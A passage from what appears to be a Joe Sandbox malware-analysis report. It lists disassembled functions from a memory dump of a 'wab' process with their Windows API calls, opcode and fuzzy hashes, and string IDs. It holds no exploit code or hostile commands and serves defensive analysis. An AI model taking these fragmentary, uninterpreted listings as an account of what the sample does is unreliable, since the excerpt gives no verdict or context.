                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: fdaf7c221553fa3d99baedce4f360f1f5535380ea0dd65d5a88a596ccf078b3c
                                                                                                                                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdaf7c221553fa3d99baedce4f360f1f5535380ea0dd65d5a88a596ccf078b3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2903831945-0
                                                                                                                                                                                                                    • Opcode ID: 57d3071dd2de7bbc8e1c08973dbf7d9290014f20ee3246d914a41c796bcca670
                                                                                                                                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57d3071dd2de7bbc8e1c08973dbf7d9290014f20ee3246d914a41c796bcca670
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                                                                                    • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                                                                                    • API String ID: 102104167-2245444037
                                                                                                                                                                                                                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$??3@
                                                                                                                                                                                                                    • String ID: g4@
                                                                                                                                                                                                                    • API String ID: 3314356048-2133833424
                                                                                                                                                                                                                    • Opcode ID: 5ca90841aa7ac27d251937f4286d5c28b71121c56bc89bd43d9446bd4e5208fe
                                                                                                                                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ca90841aa7ac27d251937f4286d5c28b71121c56bc89bd43d9446bd4e5208fe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _memicmpwcslen
                                                                                                                                                                                                                    • String ID: @@@@$History
                                                                                                                                                                                                                    • API String ID: 1872909662-685208920
                                                                                                                                                                                                                    • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                                                                                                                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                                                    • API String ID: 210187428-168460110
                                                                                                                                                                                                                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                    • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                    • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                    • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                    • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1889144086-0
                                                                                                                                                                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
